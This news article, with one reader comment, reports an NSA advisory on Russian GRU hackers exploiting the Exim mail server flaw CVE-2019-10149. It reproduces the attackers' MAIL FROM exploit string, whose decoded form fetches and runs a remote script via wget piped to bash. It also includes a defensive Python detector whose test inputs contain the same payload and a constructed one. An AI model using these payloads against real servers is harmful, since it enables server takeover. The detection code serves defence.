The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.
The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.
Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:
MAIL FROM:${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2Fhostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be

That hexadecimal decodes to:

/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"
"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.
In this case, the miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in src/deliver.c: the MTA expands an address whose local part contains a ${run{...}} expansion item, so the shell command inside it is executed on the server. Here that command downloads and runs a further script to commandeer the box. An in-depth technical description of the programming blunder is in the write-up by Qualys, which found and reported the flaw last year.
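The sample above works because Exim interprets backslash escapes such as \x2F and \t while expanding the address, so the attacker can smuggle slashes, spaces and quotes through a local part that would otherwise not survive SMTP parsing. As an added example (not code from the NSA advisory, The Register or the Exim project), here is a small Python checker that decodes those escapes and flags ${run{ in envelope senders. It runs over three constructed MAIL FROM lines, the first copied from the censored sample above; the escape rules are my approximation of Exim's string_interpret_escape() behaviour, and the verdict labels are analyst heuristics rather than anything Exim itself emits.

```python
"""Decode Exim-style backslash escapes in SMTP envelope senders and flag the
${run{...}} expansion item used in the CVE-2019-10149 sample.

Added illustration; not code from the NSA advisory, The Register or Exim.
Escape handling approximates Exim's string_interpret_escape(); verdict
labels are heuristics chosen for this example.
"""
import re
from typing import List, Optional

_NAMED_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def decode_exim_escapes(s: str) -> str:
    """Interpret \\xHH (1-2 hex digits), \\ooo (1-3 octal digits), \\n, \\r, \\t.
    Any other backslash-c pair becomes c, which also covers \\\\ and \\: ."""
    out, i = [], 0
    while i < len(s):
        ch = s[i]
        if ch != "\\" or i + 1 == len(s):
            out.append(ch)
            i += 1
            continue
        nxt = s[i + 1]
        if nxt == "x":
            m = re.match(r"[0-9A-Fa-f]{1,2}", s[i + 2:i + 4])
            if m:
                out.append(chr(int(m.group(), 16)))
                i += 2 + len(m.group())
                continue
            out.append("x")  # "\x" with no hex digits: keep it literal
            i += 2
            continue
        if nxt in "01234567":
            m = re.match(r"[0-7]{1,3}", s[i + 1:i + 4])
            out.append(chr(int(m.group(), 8)))
            i += 1 + len(m.group())
            continue
        out.append(_NAMED_ESCAPES.get(nxt, nxt))
        i += 2
    return "".join(out)


def extract_reverse_path(line: str) -> Optional[str]:
    """Pull the address out of 'MAIL FROM:<addr> [ESMTP params]' (or bare addr)."""
    m = re.match(r"\s*MAIL\s+FROM:\s*(.*)", line, re.I)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith("<"):
        end = rest.find(">")
        return rest[1:] if end == -1 else rest[1:end]
    return rest.split(" ", 1)[0]  # drop ESMTP parameters such as SIZE=


def classify_local_part(local_part: str) -> dict:
    """Decode first, then look for Exim expansion syntax in the local part."""
    decoded = decode_exim_escapes(local_part)
    if "${run{" in decoded:
        verdict = "exploit-attempt"  # Exim's run item executes a shell command
    elif "${" in decoded:
        verdict = "suspicious"       # any expansion item in a local part is abnormal
    else:
        verdict = "clean"
    return {"raw_local_part": local_part, "decoded_local_part": decoded,
            "verdict": verdict}


def scan_mail_from_lines(lines: List[str]) -> List[dict]:
    results = []
    for line in lines:
        addr = extract_reverse_path(line)
        if addr is None:
            continue
        local_part = addr.rsplit("@", 1)[0]
        r = classify_local_part(local_part)
        r["line"] = line
        results.append(r)
    return results


# Constructed input. The first line is the censored sample from the article
# (hxxp is the article's defanging); the other two are made up for this example.
SAMPLE_LINES = [
    r"MAIL FROM:${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2Fhostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be",
    "MAIL FROM:<alice@example.com> SIZE=2048",
    r"MAIL FROM:<${run{\x2Fbin\x2Fid}}@example.invalid>",
]

if __name__ == "__main__":
    for r in scan_mail_from_lines(SAMPLE_LINES):
        print(f"{r['verdict']:16} {r['decoded_local_part']!r}")
```

Feed it MAIL FROM lines captured at an SMTP proxy or pulled from Exim's rejectlog; matching on the decoded form matters because the raw line never contains the string "/bin/sh" that a naive grep would look for.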
Because Exim runs on millions of Linux and Unix servers, and an MTA by its nature accepts connections from the public internet to receive mail, bugs in it are exposed to anyone who can reach port 25 and pose an attractive target for hackers of all nations.
The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.
Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
(Score: 3, Informative) by Pav on Saturday May 30 2020, @10:39PM
Perhaps Russian hackers attached to the Kremlin DID do this... but because this story seems to mesh with a certain narrative, and because of that context I thought I'd mention significant LEFT critiques of Russiagate posted recently - this issue is not strictly divided along partisan lines as many would like us to believe.
Glenn Greenwald from The Intercept, a journalist who broke the Snowden story and who has enough of a legal background to have insight into issues of law, comments on the Flynn case and the wider Russiagate context [youtube.com].
Aaron Mate and Matt Taibbi [youtube.com], both winners of the I.F. "Izzy" Stone independent journalism award, published at The Hill, The Nation and many other left publications, also discuss the Flynn case and Russiagate.